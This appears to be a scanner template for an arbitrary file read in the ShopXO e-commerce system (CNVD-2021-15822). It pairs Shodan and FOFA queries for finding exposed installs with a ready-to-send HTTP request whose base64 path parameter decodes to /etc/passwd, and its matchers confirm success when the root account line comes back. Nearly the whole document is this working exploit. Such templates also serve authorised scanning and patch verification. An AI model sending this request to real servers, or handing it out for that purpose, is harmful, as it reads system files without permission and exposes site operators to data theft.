## id: CNVD-2021-15822
## name: ShopXO Download File Read
## author: hack007x
## severity: high
## tags: cnvd2021,cnvd,shopxo,lfi,vuln
## description: ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
## affects: shopxo
## reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
## shodan-query: title:"ShopXO企业级B2C电商系统提供商"
## fofa-query: app="ShopXO企业级B2C电商系统提供商"
## verification: true

GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

#@ condition: and
#@ matcher: body matches /root:[^:]*:[0-9]+:[0-9]+:/
#@ matcher: status_code == 200





# @VEIL-STAMP: 5cf259eb24be88eba39a4a4eaa8700ef16c9c434f4121eb074aa2d628fc1229b
